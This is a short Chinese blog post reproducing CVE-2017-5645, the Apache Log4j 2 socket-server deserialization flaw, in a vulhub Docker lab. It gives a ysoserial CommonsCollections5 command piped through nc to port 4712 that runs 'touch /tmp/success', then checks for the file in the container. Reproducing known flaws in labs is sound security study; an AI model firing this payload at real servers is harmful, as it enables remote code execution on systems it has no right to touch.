vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)

余生有个小酒馆2024-02-20 12:59

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

1.我们使用ysoserial生成payload,然后直接发送给`your-ip:4712`端口即可。

复制代码 
java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712

工具地址 https://github.com/frohoff/ysoserial

需要注意JDK版本的问题 https://github.com/frohoff/ysoserial/issues/203

2.然后执行`docker compose exec log4j bash`进入容器,可见 /tmp/success 已成功创建:

相关推荐
小宇的天下1 天前
Cadence allegro---assign net
服务器·php·apache
软件派2 天前
Apache Paimon终极教程——流批一体存储引擎深度解析(附Flink集成案例+性能调优代码)
apache·性能调优·流批一体·实时数据处理·paimon教程·flink集成·湖仓架构
三水不滴2 天前
Apache RocketMQ的原理与实践
经验分享·apache·rocketmq
whale fall3 天前
celery -A tool.src.main worker --loglevel=info --queues=worker1_queue & 什么意思
python·学习·apache
我送炭你添花3 天前
Pelco KBD300A 模拟器:19.pytest集成测试(serial + protocol + macro)
python·log4j·集成测试
TracyCoder1233 天前
ElasticSearch核心引擎Apache Lucene(五):相关性算分 (Scoring)
elasticsearch·apache·lucene
码上上班3 天前
一文学会apache httpd
apache
野生技术架构师3 天前
Spring Boot 3 集成 Apache Calcite:多数据源查询的终极解决方案
spring boot·后端·apache
TracyCoder1234 天前
ElasticSearch核心引擎Apache Lucene(四):段 (Segment) 的设计与合并
elasticsearch·apache·lucene
我送炭你添花4 天前
Pelco KBD300A 模拟器:18. 按依赖顺序 + 复杂度由低到高逐步推进pytest单元测试
python·单元测试·log4j·pytest
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书03OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)04OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书05UV安装并设置国内源062026美赛A题智能手机电池续航时间预测的连续时间数学模型07Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08在Trae中使用Pencil MCP09Claude Code Skills 实用使用手册10Linux下V2Ray安装配置指南